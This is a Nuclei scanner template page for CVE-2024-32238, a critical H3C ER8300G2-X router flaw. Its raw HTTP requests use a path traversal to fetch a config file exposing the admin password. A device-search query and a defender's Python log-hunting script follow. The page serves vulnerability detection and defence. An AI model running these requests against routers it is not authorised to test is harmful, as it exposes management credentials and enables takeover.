H3C ER8300G2-X - Password Disclosure
ID: CVE-2024-32238
Severity: critical
Author: s4e-io,adeljck
Tags: cve,cve2024,h3c,router,info-leak
Description
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router’s management system can be accessed via the management system page login interface.
YAML Source
id: CVE-2024-32238

info:
  name: H3C ER8300G2-X - Password Disclosure
  author: s4e-io,adeljck
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  reference:
    - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/20142995/nuclei-templates
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.00053
    epss-percentile: 0.23191
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="icg_helpScript.js"
  tags: cve,cve2024,h3c,router,info-leak

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /userLogin.asp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: module_name
        part: body
        internal: true
        group: 1
        regex:
          - "<title>([A-Za-z0-9-]+)系统管理</title>"

  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "application/x-unknown")'
          - 'contains_all(body, "admpwd=", "auxauthmode=")'
          - 'contains(server, "H3C-Miniware")'
        condition: and
# digest: 490a0046304402201573e81732963318daef6a15f22070ac6b2d09193373afe5d2d38d12fb82b0840220630173c580730795511f10fc1e64378228f7b46901743a130f0b55b51de6eb03:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32238.yaml"
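For defenders, the second request in the template has a distinctive path shape that can be hunted in logs from a proxy or WAF sitting in front of the device. The following is an added example, not part of the template or the Nuclei project; the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path shape of the template's second request; the module name uses the
# same character class as the template's extractor regex.
PROBE_PATH = re.compile(
    r"^/userLogin\.asp/\.\./actionpolicy_status/\.\./([A-Za-z0-9-]+)\.cfg(?:\?.*)?$",
    re.IGNORECASE)

# Assumption: combined log format from a proxy or WAF in front of the router.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2024:10:01:02 +0000] "GET /userLogin.asp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2024:10:01:05 +0000] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1" 200 20480 "-" "-"',
    '198.51.100.7 - - [12/May/2024:10:01:09 +0000] "GET /userLogin.asp/%2e%2e/actionpolicy_status/%2E%2E/ER8300G2-X.cfg HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.10 - - [12/May/2024:10:02:00 +0000] "GET /icg_helpScript.js HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def normalise(target):
    """Percent-decode up to twice so %2e%2e and %252e%252e forms still match."""
    for _ in range(2):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")

def find_probes(lines):
    """Return one record per request matching the template's .cfg path."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = PROBE_PATH.match(normalise(m["target"]))
        if hit:
            # A 200 mirrors the template's status matcher: the config was served,
            # so the management password should be treated as exposed.
            hits.append({"src": m["src"], "time": m["ts"],
                         "module": hit.group(1), "served": m["status"] == "200"})
    return hits

if __name__ == "__main__":
    for h in find_probes(SAMPLE_LOG):
        print(h)
```

A hit with `served` set to true warrants rotating the management password and restricting access to the management interface.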